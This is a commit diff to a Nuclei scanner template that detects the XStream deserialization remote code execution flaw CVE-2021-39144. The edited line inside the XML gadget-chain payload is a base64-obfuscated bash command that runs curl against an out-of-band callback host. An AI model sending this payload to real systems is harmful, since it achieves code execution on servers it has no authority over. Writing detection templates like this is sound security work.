daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2021-39144.yaml

patch-1
j4vaovo 2023-04-24 03:59:57 +08:00 committed by GitHub
parent 166cc9ef1d
commit 81dea5dafb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
cves/2021/CVE-2021-39144.yaml
View File

@ -19,6 +19,9 @@ info:
cwe-id: CWE-94,CWE-502
tags: cve,cve2021,xstream,deserialization,rce,kev
variables:
rand: "{{rand_base(6)}}"
requests:
- raw:
- |
@ -61,7 +64,7 @@ requests:
</probes>
</handler>
</dynamic-proxy>
<string>curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'</string>
<string>/bin/bash -c {echo,{{base64("curl http://{{interactsh-url}} -H \'User-Agent: {{rand}}\'")}}}|{base64,-d}|{bash,-i}</string>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
@ -75,6 +78,6 @@ requests:
- type: word
part: interactsh_request
words:
- "User-Agent: {{rand_base(6)}}"
- "User-Agent: {{rand}}"
# Enhanced by cs on 2023/04/17